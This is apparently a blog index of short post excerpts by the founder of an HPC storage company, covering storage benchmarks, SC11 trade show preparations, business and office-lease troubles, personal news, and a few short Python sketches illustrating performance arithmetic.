Yeah, that’s about 10-15% better performance (newer driver, updated/tuned kernel, …). Nice! FWIW: some of our competitors have trouble sustaining this performance out of their storage clusters with double to quadruple the number of drives, RAIDs, etc.
Posts
Finally moving to git
Yeah, its taken a while. I started out many moons ago with tools like rcs/sccs, moved to the great new CVS when it came out. Then when subversion (SVN) came out later on, I happily set up a private instance, and tried learning it. Wasn’t too painful. But SVN doesn’t do collaborative development very well. Actually, “not very well” is being kind to SVN. SVK was a perl wrapper around SVN that added some of what we needed.
Posts
positive signs
As the year winds to a close … only 16 days left, we’re still quite busy. I am taking this as a net positive. I’ve heard lots of M&A whispers over the last few months, some interesting things going on that I can’t talk about (not involving us). We’ve got lots of potential activity for Q1 lined up, and this is … good. :) More soon. (Won’t have monster 7 part posts next week, but some I’ve been thinking about for a long time and have been wanting to write about)
Posts
Dear Joe ...
… thanks for being a partner of ours. Unfortunately, the 10x baseline requirement amount of gear that you purchased through other channels doesn’t matter to us; you must purchase the baseline amount by year’s end (today is 15-December) through one of these very specific (and problematic) channels to remain a partner. Oh, and there are a few other things you have to do by year’s end, which we notified you of only 2 days ago.
Posts
As tiburon progresses ...
We are now booting: Redhat 6.1, Centos 6.0, Ubuntu 11.04, and others (including VMs!) via tiburon. Completely painless for compute and storage nodes. This is letting us get to the next phase: Application Specific Nodes (or “appliances on demand” in more common language). Basic idea is, spend zero … identically zero time on your expensive private/public cluster/cloud/grid/yadda yadda doing an installation. Seriously, you should not be paying cloud providers for this, and if you are, this is a problem.
Posts
Semi OT: New laptop is in
Have Linux loaded. And Windows 7 Pro (actually upgraded from the Windows 7 Home they had). Ok … I like it. It is very fast. About as heavy as the Dell (maybe a little more so). Keyboard is chiclet style. I’m ok with this; the Dell had a more standard type of keyboard. I can touch type on this without problem. If anything, I like it a little better. Graphics are awesome.
Posts
Big memory machines ... part 2: This time with working riser cards
Yeah baby!
top - 14:55:24 up 2:38, 1 user, load average: 0.13, 0.17, 0.17
Tasks: 697 total, 1 running, 696 sleeping, 0 stopped, 0 zombie
Cpu(s): 0.1%us, 0.1%sy, 0.0%ni, 99.8%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
Mem: 1009.840G total, 18.159G used, 991.680G free, 0.000k buffers
Swap: 0.000k total, 0.000k used, 0.000k free, 148.590M cached

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ P COMMAND
4455 root 20 0 15532 1720 944 R 1.
Posts
Update on the lawyer-bomb across our bow
Yeah, with all that we have going on, the last thing we need is a clueless company firing a lawyer-bomb across our bow. Remember that life isn’t fair, no time is ever a good time, and sh!t happens. It seems that the whole purpose of their … er … communication … was to try to get us to buy the property rather than be taken to court for rent that is not due them.
Posts
OT: options are known, surgery date is set
In any cancer, it appears the most important thing is to control its growth, arrange for removal, and expedite this process. You don’t want the buggers hanging around for longer than needed. We got our surgery date this past Monday. 1 day after my daughter’s 12th birthday, my wife will undergo the operation. It’s the recovery process we are preparing for, though the sheer velocity of this stuff is hitting hard.
Posts
Ok, I gave in and did it
My trusty Dell laptop is about to be retired. It’s a year and a half overdue. Doug was working hard trying to sell me the benefits of the MacBook Air (he has the company’s only unit). He also has the Mac mini on his desk. I need a serious graphics card in the laptop. An NVidia card (for the occasional CUDA programming bit, and some things I work on in the background) is preferred.
Posts
Moving web code base from Catalyst to Mojolicious
It’s a long story. For those who don’t know, Catalyst is a Perl-based web framework. So is Mojolicious. The person who started developing Catalyst years ago left that group, and started Mojolicious later on. I like many things about Catalyst. Like other MVC frameworks, it lets you divide up your logic between controllers (the heavy lifters), the model (aka the database), and the display logic. Prior to this, I wrote some rather ugly looking code which combined controllers and display logic.
Posts
Monitoring tools
We have a collection of tools that we use for various monitoring. Some are the classical standards (iostat, vmstat, …), some the somewhat more heavyweight (collectl, dstat), and some the simple (not in a bad way) graphical tools (munin, ganglia, …). We’ve found tools like Zabbix do a good job of killing some machines, as there are often memory leaks in these tools. What we’ve not found, anywhere, is a good set of simple measurement tools that provide data in a form that is easy to include in something akin to a dashboard.
Posts
big memory machines
Haven’t finished debugging this unit yet. Thought you might like to see top info. These are physical CPUs BTW, not SMT.
top - 09:21:29 up 3 min, 2 users, load average: 0.22, 0.21, 0.09
Tasks: 219 total, 1 running, 218 sleeping, 0 stopped, 0 zombie
Cpu0 : 0.7%us, 0.3%sy, 0.0%ni, 99.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
Cpu1 : 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
Cpu2 : 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.
Posts
Ahhh ... drama ... just what I need right now
Way back some time ago, our landlord, whom we were somewhat concerned about due to their financial state (lots of vacant spots here in our complex), had their mortgage called by the bank that took over for the bank they’ve had before, when it went belly up. That new bank called their loan. They didn’t notify us of this until we got the note from the lawyer demanding we pay them rent rather than the landlord.
Posts
OT: it really focuses your attention on the important things
[Update below the fold] My wife has this tongue-in-cheek “theory” on balance in the universe. Comes from being a physics geek I guess (yeah, we are a pair). Maybe I’ll tell the “spherical horse” joke some day again, in public. Our opening of 2011 was, well, crappy. And that’s an understatement. We lost her father Frank to cancer. He had fought off one form, and 2 years later, it reared its ugly head.
Posts
I just can't say enough good things about HP's procurve networking gear
Basically, their support rocks! Their switches are pretty good to begin with. But (apart from very long phone waits … 50+ minutes in this case), their support team is exactly what I want to deal with. No nonsense, speaking to someone who knows what’s going on with the units. Kudos again to #HP !
Posts
Some of the more mainstream publications are now at least acknowledging the prospect of an epic failure
… in climategate … The Register’s piece isn’t bad. Actually quite good. Their thesis is “this sort of stuff happens when you get big money/politics following dubious claims; a cottage industry and groupthink evolve”. They note similar examples from other industries. I am not saying I completely agree with their characterization; it sounds reasonable, but it compares somewhat dissimilar things with a similar metric. The issue is that public policy (and money, influence, power, …) flows from the political class and could pollute the underpinnings of the scientific class.
Posts
Senses of urgency
We do lots of business with customers who want things yesterday. We do what we can to accommodate, but we do build things in a just-in-time model. Avoids costly inventory, and keeps us nimble. This also means we have to micromanage our suppliers. Many don’t quite understand what a “sense of urgency” means. When we tell them we want something by a specific date, and they ship it a month later … Or a case we are dealing with now, where we’ve had a long/huge wait from a supplier, who then shipped us something non-working.
Posts
Announcing dust v1.0
Dust has finally …. FINALLY …. been released. We’ve had the driver update packs out there for a while, but finally we’ve released DUST. What is DUST you might say? How about a way to automatically update drivers from source/distributions? But wait … isn’t that just dkms? Sort of. We’ve found … horrific problems … with DKMS that we couldn’t solve. We wound up writing scripts to work around DKMS as it didn’t build things the way we needed them built.
Posts
Uptick in requests for software only solution
Some locations are farther than others, and this makes shipping gear pretty expensive. We’ve been asked for a software-only version of our stack from the 2 remaining continents we don’t have installs on (ok, 2 of 3 … not too much business in Antarctica right now). I won’t get into the positives/negatives of this business model. Shipping bits lowers costs as compared to shipping atoms. But atoms are tangible, and reproducing their patterns carries a cost that bits don’t impose.
Posts
#SC11 benchmarketing gone horribly awry
OMFG … we were (and are) continuously inundated with benchmarketing numbers. These numbers purport to represent the system in question. They don’t. We can derive their numbers by multiplying the number of drives by the theoretical best case performance, assuming everything else is perfect. Never mind that it never is perfect. It’s that the benchmarketing numbers haven’t been measured in a real context. We do the measurements in a real context and report the results to end users.
Posts
#SC11 interviews, observations, and thoughts
Yeah, this show had lots of folks talking storage. Obviously we did too. Nicole from Datanami (she had a terrible cold at the time; I hope she is feeling better) asked me to give a short set of non-advertising type interviews. Below is what I did, given no prep, no forewarning, and about 30 seconds to mentally prepare (and that might be generous). Part 1: Big Data in Media and Entertainment
Posts
#SC11 wrap up, part 1 (short)
Back in Michigan. Long flight, quite tired, but back. This was a good show for us. A very good show. Gave away lots of siMugs, released siFlash, did demos and had discussions. Generally speaking, we had good booth traffic, and many readers of this blog came by to say hello. Thank you for that! I very much enjoyed this, and meeting people in person for the first time. Sponsoring Beobash was fun.
Posts
#SC11 T-1 and counting ... Beobash, booth and stuff...
Tonight was/is Beobash. First time I stopped drinking the beer, and started buying the beer. Was very nice, but we were (collectively and individually) exhausted. Snapped a few pics. Will try to have them up tomorrow. Very nice venue. Very good crowd. Booth (#SC11 booth 4101) is up. Amazingly, everything seems to be working. Even missed shipping a few things (yes, yes we did), and for the most part, was able to fix that.
Posts
#SC11 T minus 2 days : on the plane ... yeah ... on the plane
Somewhere over Montana, around Helena. Bumpy weather up ahead. Finished PR v1 for siFlash; Doug is editing. Will get this out tomorrow at a few venues (we’ve promised one specific one will be first). Working on the presentations for the booth: siFlash intro, the whole arc with big data, siCluster and our JackRabbit and DeltaV point storage units, and Tiburon. And the use cases presentation. Didn’t have time to get permission to use company names (e.
Posts
#SC11 T minus 3 days: the $dayjob mailing
Finally got this out the door. There were some issues in doing so … our CRM tool seemed to get brain-freeze. Test emails worked fine. But the real ones? Nah … fuggedaboutit. So here it is, in all its glory. We try our best (really) not to spam. I don’t like it and I know our customers don’t like it.
Storage Solutions
As a high performance big data storage specialist, Scalable Informatics is well positioned to provide your company with fast, effective, dependable, and cost-effective storage solutions.
Posts
The joys of new tools ... and discovering broken/missing functionality within them
The object of my attention this morning is dracut, the replacement for the venerable mkinitrd in the RHEL/Fedora lines. Dracut has great promise, in that it is being built as a construction kit for initial ramdisks for booting Linux. Unfortunately, like mkinitrd, it has a number of … er … failures. Happily, it has the concept of a shell you can drop into if things go pear shaped. mkinitrd generates initrds that will often simply kernel panic with no way to debug.
Posts
Using Makefiles for analysis pipelines
Got a mess-of-data. Whole load of it. Need to analyze it. Again and again and again. Don’t want to cut n paste. Or write too much code. Need to automate plot generation. This reminded me of my thesis many (cough cough) years ago. I used a Makefile to automate driving TeX. And image formatting, and final document assembly. Yes, to write my thesis, I typed “make”. Sure enough, same type of process, different decade (cough millennium).
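What makes make useful for a pipeline like this is its rebuild rule: a target is regenerated only when it is missing or older than one of its prerequisites, so after changing one input, re-running `make` redoes only the steps that depend on it. A minimal Python sketch of just that rule follows; the function names and the example file names are illustrative, and this is not how make itself is implemented.

```python
import os
from typing import Iterable, List, Optional


def is_stale(target_mtime: Optional[float], source_mtimes: Iterable[float]) -> bool:
    """make's rule: rebuild if the target is missing or any prerequisite is newer."""
    if target_mtime is None:
        return True
    return any(m > target_mtime for m in source_mtimes)


def needs_rebuild(target: str, sources: List[str]) -> bool:
    """Apply is_stale() to files on disk using their modification times."""
    target_mtime = os.path.getmtime(target) if os.path.exists(target) else None
    return is_stale(target_mtime, (os.path.getmtime(s) for s in sources))
```

For example, `needs_rebuild("plot.png", ["data.csv", "plot.py"])` (hypothetical files) would be true right after either the data or the plotting script changed.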
Posts
Almost forgot ... an instant on cluster
We set up a nice Ubuntu cluster for a customer in the financial services world recently. They wanted something that was similar enough to what they knew, and as close to painless for them to use as possible. Make it like an Ubuntu system. And make it easy to manage. Real easy. The issue was, and is, that pretty much none of the major cluster distros really support Ubuntu. A few have some hacks to enable some level of support.
Posts
in SC mode ... and trying to ship orders before we fly out ... and working on support ... and ...
I’m gonna need another vacation soon. This is nuts. Got a bunch of machines going out to the UK next week, a set of SSDs off to Sweden, machines to Texas, and California. New orders from the east coast (a number of repeat customers). Oh … and trying to get our demo systems built, and ready, and the demos up. And get the presentations together. And the PR done. And the investment thingy (gotta nudge the lawyer again, really wanted to announce this by SC11).
Posts
And now readers, its time for deep thoughts ...
[the guru sits down and starts typing with nonchalance] Complex software stacks lead to complex and often opaque failure modes. [slight bow, stands up, leaves room] Infiniband …. WHY WHY WHY WHY WHY … (grumble)
Posts
... and Sandforce is gobbled up by LSI ...
From The Register … This is interesting, as LSI appears to be girding for the next gen in storage. Flash (the PCIe variant) and SSD (the disk channel variant) are on the rise, and things that add value in that chain will be quite interesting acquisitions. We work closely with Virident, and it wouldn’t surprise me if they, or Texas Memory Systems, were acquired by a larger entity. This isn’t consolidation in the classical sense; this is girding for future battle.
Posts
#SC11 countdown and some administrivia
So we are on the long march to #SC11 (we are booth 4101, please do stop by!). Figuring out the final bits of the booth content. Working on presentations. Hoping we will have enough disks for the demos I am working on putting together. Then the fun stuff. The mugs: Doug and I had fun with these. Aren’t giving them out to everyone … you have to really cozy up to us for one … and we will have a Keurig coffee/tea maker there so we can fill em.
Posts
Is this another "Perl indistinguishable from line noise" argument? Don't know ...
… but I do know that the analysis has some … er … flaws. Yeah. Flaws. I’ll ignore their sample size issue for the moment (though it does go to the size of their error bars … I hope they appreciate the inverse functional relationship between these two). Take two sets of data with error bars. Put them down on the same graph. The data from each set overlaps within the error bars of the other set.
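The overlap test described above is easy to make concrete. This sketch assumes symmetric error bars of ±1 standard error of the mean, which shrink as 1/√n with sample size (the inverse relationship mentioned above); `standard_error` and `mutually_within_error` are illustrative names. When each mean sits inside the other’s error bar, the data simply can’t distinguish the two sets at that level, which is not the same as showing they are equal.

```python
import math
import statistics
from typing import Sequence


def standard_error(samples: Sequence[float]) -> float:
    """Standard error of the mean: sample std dev / sqrt(n); shrinks as n grows."""
    return statistics.stdev(samples) / math.sqrt(len(samples))


def mutually_within_error(m1: float, e1: float, m2: float, e2: float) -> bool:
    """True if each mean lies inside the other's +/- error bar."""
    gap = abs(m1 - m2)
    return gap <= e1 and gap <= e2
```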
Posts
A new spin on 'hard cases make for bad laws' ... but with benchmark codes
We run (as you might imagine) lots of benchmarks. We do lots of system tuning. We start with null hypotheses and work from there. Sometimes you can call that the baseline expected measurements. Your call on what you want to call it. But a measurement implies a comparison to a known quantity. In the case of the baseline or null hypothesis, you measure what you believe to be a reasonable configuration, the way it would be used.
Posts
Iris ... are you our new overlord?
So I started playing with Iris on my android phone. Not because of Siri envy, but because I heard it was … er … interesting. I started out with the usual … Me: “What is the airspeed of an unladen swallow” Iris: 28 miles per hour Ok, that was interesting. Then I asked a few other fact based questions, should be easy to answer. Finally, I wanted to see if there was some humor in what it might say (not that Iris has a personality that wishes to express humor, but possibly on the part of its programmers, or in the search results).
Posts
OT: Minor drama of renting an office
So we have our office at a nice, small light industrial site. Good pricing, reasonable location. Been here 3+ years. The landlord is about to lose the property, either to the bank because they’ve missed mortgage payments, or to the state because they haven’t paid property taxes. Oh, and they haven’t paid the water or trash collection bills. Found out about all of this last week when we were in NJ installing a cluster.
Posts
anti-scaling (1/N) problems
Imagine you have a fixed sized resource. Imagine you can completely consume that resource from 1 client. Now make this two clients, and completely consume the resource. Which is of fixed size. Each client will get 1/2 (on average) of the resource. Now make this four clients, and completely consume the resource. Which is of fixed size. Each client will get 1/4 (on average) of the resource. Don’tcha just love that anti-scaling behavior?
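The arithmetic is just a fixed capacity split across N clients: the aggregate stays the same while each client’s average share falls as 1/N. A trivial sketch, using a hypothetical 1000 MB/s resource:

```python
def per_client_share(capacity: float, clients: int) -> float:
    """Average share of a fixed, fully consumed resource across `clients` clients."""
    if clients < 1:
        raise ValueError("need at least one client")
    return capacity / clients


CAPACITY_MB_S = 1000.0  # hypothetical fixed-size resource
for n in (1, 2, 4, 8):
    share = per_client_share(CAPACITY_MB_S, n)
    print(f"{n} client(s): {share:7.1f} MB/s each, {share * n:.1f} MB/s total")
```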
Posts
Design and driver issues exposed under very high loads
Most folks, when they build Fibre Channel systems, aren’t assuming a very high IOP rate. No, really. Each channel of an FC8 connection is about 1GB/s, which with 4k operations (neglecting overheads and other things), would give you about 256k IOPs. To date, most of these units have been connected to spinning disks, which, individually might max out at 300 IOPs. So from their design perspective, you could put about 874 disks per connection, assuming a perfect configuration, to max out the data channel.
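The back-of-envelope numbers above can be reproduced directly. This sketch reads “about 1GB/s” as 2^30 bytes/s and “4k” as 4096 bytes and, like the post, ignores protocol overhead; the function names are illustrative.

```python
import math

KIB = 1024
GIB = 1024 ** 3


def max_iops(link_bytes_per_s: int, io_size_bytes: int) -> int:
    """Upper bound on operations/s a link can carry at a given I/O size."""
    return link_bytes_per_s // io_size_bytes


def disks_to_saturate(link_iops: int, iops_per_disk: int) -> int:
    """Number of disks whose combined IOPS would fill the link."""
    return math.ceil(link_iops / iops_per_disk)


link_iops = max_iops(1 * GIB, 4 * KIB)     # 262144, i.e. "256k"
disks = disks_to_saturate(link_iops, 300)  # 874
print(link_iops, disks)
```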
Posts
In the run-up to SC11, yeah ... I'm busy ...
Wow … After getting back from the UK and Sweden, a whole slew of orders came in from several existing and new customers. And booth prep (remember, we are in 4101, stop by and say hello!). And logistics … and support … and box tuning (in house, at customer sites, …) and quoting, and performance monitoring/analysis for several customers (including one where strace seems to have missed child IO processes …).
Posts
One would think I know this by now ...
… when you prepare a unit for benchmarking … mebbe … mebbe … its not such a good idea to configure it in … I dunno … super-conservative mode which … er … effectively nukes most of the performance? Mebbe? Maybe normal default config mode … which is pretty much what we should have done … is whats needed? FWIW: for the unit we are bringing to #SC11, 2 initiators over 10GbE iSCSI were running this baby to 850+k IOPs, 4k block random read write (30% mix on write, mostly read) sustained for an hour for well over 100GB of data (far far larger than internal caches).
Posts
A plea for sanity in benchmarking SSDs (and storage)
This is really starting to worry me. I see site after site running similar sets of programs against SSDs, generating the same numbers, within error bars. The problem is that the numbers they generate are meaningless due to several measurement flaws. First: Sandforce controllers compress data. Which means that some data (say simple repeating patterns of, oh, I dunno, zeros?) will compress really well, and show bandwidths far higher than real use cases will measure.
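A quick way to see why all-zero test data flatters a compressing controller is to compress it in software. The sketch uses zlib purely as a stand-in (it is not the compression SandForce controllers use internally) and compares a buffer of zeros with a buffer of random bytes of the same size.

```python
import os
import zlib


def compression_ratio(data: bytes) -> float:
    """Compressed size / original size (lower means more compressible)."""
    return len(zlib.compress(data)) / len(data)


SIZE = 1 << 20  # 1 MiB test buffers
zeros = bytes(SIZE)             # what a naive benchmark may write
random_data = os.urandom(SIZE)  # incompressible worst case

print(f"zeros:  {compression_ratio(zeros):.4f}")
print(f"random: {compression_ratio(random_data):.4f}")
```

The zero buffer shrinks to a tiny fraction of its size while the random one doesn’t shrink at all, so a controller that compresses before writing has far less work to do for the zeros, and the benchmark ends up measuring the compressor more than the flash.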
Posts
RIP Steve, and thanks for all the fish
Steve Jobs, a young man of 56, passed away this evening. While not so much in traditional HPC, Apple profoundly changed the way we work with … no … the way we use, and think about using, computing technology. He is credited with the vision, though Apple has had and does have many very smart people working there. My condolences to his immediate family, and his extended family. Today, we bought our first MacBook Air.
Posts
Dead on: Redhat grabs Gluster
Readers of this blog will know I’ve been saying this publicly for a while (and no, I had no inside knowledge of this, no knowledge of it whatsoever, no one spoke to me, and I own no shares of any of these companies). Redhat acquiring Gluster is a good thing. While AB, Hitesh, and the team have done a bang up job getting the product out, and doing interesting things with it, they needed additional capital resources to take it to the next level.
Posts
HPCWire readers choice awards: feel free to write in awesome companies/products!
See their link. They seem to have nicely allowed for write-ins, which makes voting better :) We don’t do much in manufacturing, so there’s little point to this for us. In HPC for life sciences, Scalable Informatics JackRabbit is in use at a number of sites as a very high performance storage unit. We don’t do much in automotive either. We do lots in financial services; with our Scalable Informatics JackRabbit being the best in breed performance for spinning rust systems, and from my understanding, causing some of our friends with pure PCIe Flash or SSD to say WTH!
Posts
knobs that work
As mentioned earlier, we’ve had a consistent problem with a few customers who wish to ignore their bills. They’d like to pretend we have no interest in getting paid, so they don’t pay. This is part of the reason why we’ve stopped acting like a bank. We aren’t very good at it, and it’s not our core competency. You want credit, go to a bank. You want the fastest (in terms of measured speed, not theoretical guesses) storage you can get, we can help.
Posts
HP's board asks a deep fundamental question, possibly 10 months too late
“Is this the right person for the job”? I pointed out that the direction itself was probably not that well thought out, and the concept … dropping 1/3 of your revenue base, when you are atop the market in terms of installed base and run rate, probably wasn’t an idea that really should have been given serious credence. HP’s board is now, belatedly, asking … do we have the right person for the job?
Posts
On the test track with some new relampago device ...
and we hit the throttle … crack it open … let’s see what this baby can do. Looking at a sustained … well … I dunno … 1.2 million IOPs? Occasional bursts to 2.4M IOPs? At very nearly 10 GB/s? What does fio say?
read : io=524416MB, bw=9339.6MB/s, iops=1195.5K, runt= 56150msec and
Run status group 0 (all jobs): READ: io=524416MB, aggrb=9339.6MB/s, minb=9563.8MB/s, maxb=9563.8MB/s, mint=56150msec, maxt=56150msec
Nice! You may see something like this at SC11.
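These figures can be sanity-checked quickly. Bandwidth divided by IOPS gives the average size of each I/O. The Python sketch below assumes that this fio version's `MB` means 1024-based MiB, which is an unverified reading of its output. Under that assumption the run works out to 8 KiB reads, so the ~10 GB/s and ~1.2M IOPs figures describe the same run from two angles.

```python
def implied_block_size_kib(bw_mib_s: float, iops: float) -> float:
    """Bandwidth divided by IOPS: the average amount moved per I/O, in KiB."""
    return bw_mib_s * 1024 / iops


# Figures copied from the fio summary above: bw=9339.6MB/s, iops=1195.5K
print(f"{implied_block_size_kib(9339.6, 1195.5e3):.2f} KiB per I/O")
```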
Posts
Semi OT: Solar Ypsi
Sometimes you know what your friends and acquaintances are up to … and sometimes you see them in adverts for Google search … Here’s the advert:
It’s semi-OT as the person, Dave Strenski, is also a longtime HPC hand at Cray, and was a colleague of mine during our SGI/Cray days. He was one of the reasons I thought Cray had simply some of the best technical people anywhere.
Posts
Some boot options considered harmful to performance
(BTW: still in London, then off to Stockholm, then home) A customer just saw this with RHEL 6. Windows performance was higher than Linux performance on the same machine. The customer didn’t understand it, we took a guess at first, and in the end our initial guess was wrong. But we caught what was wrong with a WAG, and it troubled me. So I wrote this. The first clue as to the nature of the problem came from numastat.
Posts
Coming soon to a JackRabbit and DeltaV near you ...
… 4TB drives. Imagine, a nice 192TB in a single unit, coupled to a 5GB/s data movement engine. Coming soon … :)
Posts
Hitachi Data Systems acquires Bluearc
[disclosure note: this is our space, so we have definite opinions on this] This was likely the only possible path for Bluearc to continue outside of an IPO. The latter would probably not have gone well. They raised their last round of capital a year ago. Reading what I wrote then, it was fairly prescient. Since that was written, EMC acquired Isilon, NetApp acquired LSI’s Engenio and other products, Dell grabbed Compellent (different market), HP grabbed 3Par.
Posts
Seeing the light ... lots of app migration to accelerators (GPUs in particular)
Last week, Gaussian Inc. started publicly talking about its GPU port of its Gaussian code. This is as conservative a development company as you will find. I know many other companies with ports (I won’t violate NDAs, which I’ve signed with a number of folks who post/comment here, and who read these … feel free to post a note/link to your accelerated app). We’ve seen the early adopters come and stay.
Posts
The business of business
Just got an email from a vendor of workplace notices that reads
I won’t use the exact verbiage I think is appropriate for this.
So we’ve got an economy that’s struggling (well, we can euphemistically call it struggling), we have small businesses looking with great unease at future cost obligations due to new rules and regulations (one of which has been ruled unconstitutional, but the administration is pushing ahead on it anyway) … and the current administration is seeking to make sure that my company’s employees know that they can organize, that I have to tell them this, and that it’s unfair if I don’t.
Posts
Science by ad hominem? The continuing saga of a debate that is not scientific, but personal
This is sad. I am not sure precisely who is beclowning themselves, but we see something that amounts to an ad hominem attack on a pair of researchers, who had the temerity to publish something that disagreed with the orthodoxy. Along the way, they are described as “uncareful” and “serial error” creators. Their paper has been ripped to shreds in blogs, and by a particular aspect of the media, as well as by various members of the orthodoxy.
Posts
badly underwhelmed by 120GB Intel 510 performance
The day job uses lots of SSDs as well as disks in many of our products. We rely upon internal testing and external benchmarks (which tend to be poor at best, but serve as a very rough zeroth-order test) to select them. We had a pair of Intel 510 SSD units in for a customer, and they performed … just meh … not all that exceptional. Better than our OS drives, but not as good as the higher end SSDs.
Posts
Fixing pausing Nehalem/Westmere units
Some Nehalem and Westmere units have … er … interesting unintended features … yeah, that’s the politically correct way to say it. We like Intel and their products (and we’ve liked AMD in the past and their products). But we gotta call this one. As you watch dstat output, you see these occasional … hangs … for a few seconds. As if someone is monkeying with the clock. And that is, to a degree, what appears to be happening.
Posts
Raw unapologetic firepower in a single machine ... a new record
This is a 5U 108TB (0.1 PB) usable high performance tightly coupled storage unit we are shipping to a customer this week. This is a spinning rust machine. We’ve been busy little beavers. Tuning, tweaking. And tuning. And tweaking. Did I mention the tuning and tweaking?
Run status group 0 (all jobs): WRITE: io=196236MB, aggrb=4155.7MB/s, minb=4255.4MB/s, maxb=4255.4MB/s, mint=47222msec, maxt=47222msec Oh. My. But … it gets … better.
Run status group 0 (all jobs): READ: io=196236MB, aggrb=5128.
Posts
knobs
A knob is something you can turn, in theory, to effect a change in output condition. In my business, I have a few knobs I can turn for customers to help them. We can be quite creative in this. We are often asked to help in cases where other companies would just start blinking rapidly. I like doing this. I really do enjoy working with customers and helping them solve their hard problems.
Posts
Day job will have a booth at SC11 ... Woot!
What’s different about this one? It’s ours, not space in someone else’s. Gives us more freedom, but also greater responsibility. One of the harder things to do is to figure out what to bring and show, and what to leave in the lab. Shipping stuff to the floor is expensive, time consuming, and a royal pain in the rear. Leaving it in the lab, and leveraging the network (not the wireless … oh god that was horrible last year) is probably a better option.
Posts
Day job adds a director of sales
Took us long enough, but fundamentally, you have to work on getting the right team together. Someone I’ve known and respected for quite some time became available. I’ve been saying for a while we need someone just like him. So I didn’t miss the opportunity. Looking forward to reaching more customers and partners with him on board. More later …
Posts
Another day job milestone: afterburners kicking in on the company!
As of today, we have achieved our highest revenue ever in a year as a company. And the year is only 3/4 over. We’re not done. Not by a long shot. If we shut the doors, and went on a nice 3+ month long vacation until the end of the year … we’d have a 20% growth rate over last year for revenue. As it is, the 4th quarter is usually our busiest time.
Posts
'Amusing' benchmarketing ... without ever having run a benchmark!
Imagine you have a product, and you really haven’t measured its performance, but you want to make performance claims. So you take an “easy” way around this. You simply add up all your bandwidth or IOP data. Yeah, that’s it, you add it up. No, I’m not kidding. You do this. Is this meaningful in the HPC world? Hell no. Do people do this? Hell yes. Is it wrong? Extremely. Should you call vendors out who do this?
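The Python sketch below contrasts adding up numbers with estimating a ceiling. The drive, controller, and bus figures are made up for illustration. Summing per-device bandwidth ignores that data must also pass through the controller and the bus in series. Even a back-of-the-envelope estimate should therefore take the slowest stage, and that figure is still only an upper bound until a benchmark is actually run.

```python
from typing import Sequence


def summed_claim(device_mb_s: Sequence[float]) -> float:
    """The benchmarketing number: add up every device's spec-sheet bandwidth."""
    return sum(device_mb_s)


def pipeline_ceiling(device_mb_s: Sequence[float], controller_mb_s: float, bus_mb_s: float) -> float:
    """Data passes through devices, controller and bus in series, so the slowest stage caps it."""
    return min(sum(device_mb_s), controller_mb_s, bus_mb_s)


# Hypothetical spec-sheet figures, for illustration only.
drives = [150.0] * 24
print(summed_claim(drives))                      # 3600.0
print(pipeline_ceiling(drives, 2000.0, 4000.0))  # 2000.0
```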
Posts
A 'cool' xfs bug
No, really, bugs can be cool … Customer has a user with a proclivity towards writing large files. Sparse large files. Say, a couple of petabytes or so. Single file. I kid you not. (filenames and paths changed)
[root@jr4-2 ~]# ls -alF /data/brick-sdd2/dht/scratch/xyzpdq total 4652823496 d--------- 2 1232 1000 86 Jun 27 20:31 ./ drwx------ 104 1232 1000 65536 Aug 17 23:53 ../ -rw------- 1 1232 1000 21 Jun 27 09:57 Default.
Posts
... and Ubuntu 11.04 has an ever so slightly broken root on iSCSI ...
Ugh. See here. Got bit by this. BTW: The new internals of Tiburon are getting even more wild. This thing is turning into a very powerful system for booting large numbers of machines with (nearly) identical configs, very quickly (hmmm … can you say … cluster? Cloud? VMs? …. mwhahahaha!). Will be re-adapting our menu system for this, but the Web GUI portion for configuring this is definitely in the near future.
Posts
Been working on a GUI ... starting to hook the bits together ...
The day job is asked for monitoring and admin GUIs for our products. I’ll be the first to admit I am a CLI person these days (having started out a CLI person, then becoming a GUI person, now back to a CLI person). I understand the desire for this, and some of the rationale behind it. So we’ve been thinking how to provide this as simply and unobtrusively as possible. And leverage/use/reuse our CLI goodness.
Posts
An interesting perspective on running and maintaining a business in California
[update: reorganized to have link up top, and commentary below this] Have a read of this blog entry. Very interesting. As a small business person, I am acutely aware of all the myriad ways that rules, regulations, taxes and fees can rise unexpectedly upon you. When taxes aren’t sane or predictable, you can suddenly get a bill for a substantial fraction of a well-paid employee’s monthly or yearly salary. We had that experience last year with Michigan’s MBT which replaced the SBT.
Posts
Interesting comment from an SSD vendor support person
Color me unimpressed. You have a “disk” drive, you expect all the trappings of that “disk” drive to work. Like activity lights. So you plug this device into a backplane that lights its activity lights from the disk. And it doesn’t work. Speaking with the backplane folks, they get their signals from the disk. Speaking with the disk folks … Me: The activity light appears to be solid on all the time.
Posts
Very cool science: broad spectrum anti-viral
I saw this initially on /., and it linked to PLoS. PLoS is a great system BTW, and I’d love to see Physics, Engineering, CS, and other things join in. arxiv.org serves a similar function (rapid publication) though it isn’t peer reviewed prior to publication, while PLoS is. Basically, this anti-viral appears to show excellent efficacy across multiple virus infections … everything from Dengue Fever to Rhinovirus (common cold). It would be wonderful if this technique would be active against retroviruses (HIV, etc.
Posts
then afterburners kicked in ...
… sumthin fierce … This could be (the) fastest 4U box on the market for streaming, which doesn’t use RAM for storage.
Run status group 0 (all jobs): READ: io=761904MB, aggrb=7455.4MB/s, minb=7634.3MB/s, maxb=7634.3MB/s, mint=102196msec, maxt=102196msec
That streaming is more than 8x RAM size. No PCIe flash cards in the unit. None. Zero. Zilch. yeah BABY!!! Right now, running a random read of that data set. 8k random reads across the entire 700+ GB data set.
Posts
Setting expectations for SSDs versus Flash
Nomenclature: SSD is a physical device that plugs into an electrical disk slot. Flash is a PCIe card. Both use the same underlying back end storage technology (flash chips of SLC, MLC, and related). I’ve had a while to do some testing with a large number of SSD units in a single device. I can give you a definite sense of what I’ve been observing. First: SSDs are, of course, fast for certain operations.
Posts
"Evolution" for Microsoft HPC
This is old news at this time, but Microsoft has moved its HPC group into their Cloud groups. I’ve talked in the past about critical business decisions that need to be addressed over time, as a business matures, and a product line is given time to sink or swim. At the end of the day, a business has to make hard decisions about what products to introduce, which to end-of-life, which to grow independently, which to fold into other initiatives.
Posts
heh ... good one !
“Scientists Trace Heat Wave To Massive Star At Center Of Solar System” See here
Posts
Not surprised ... IBM pulls plug on Blue Waters
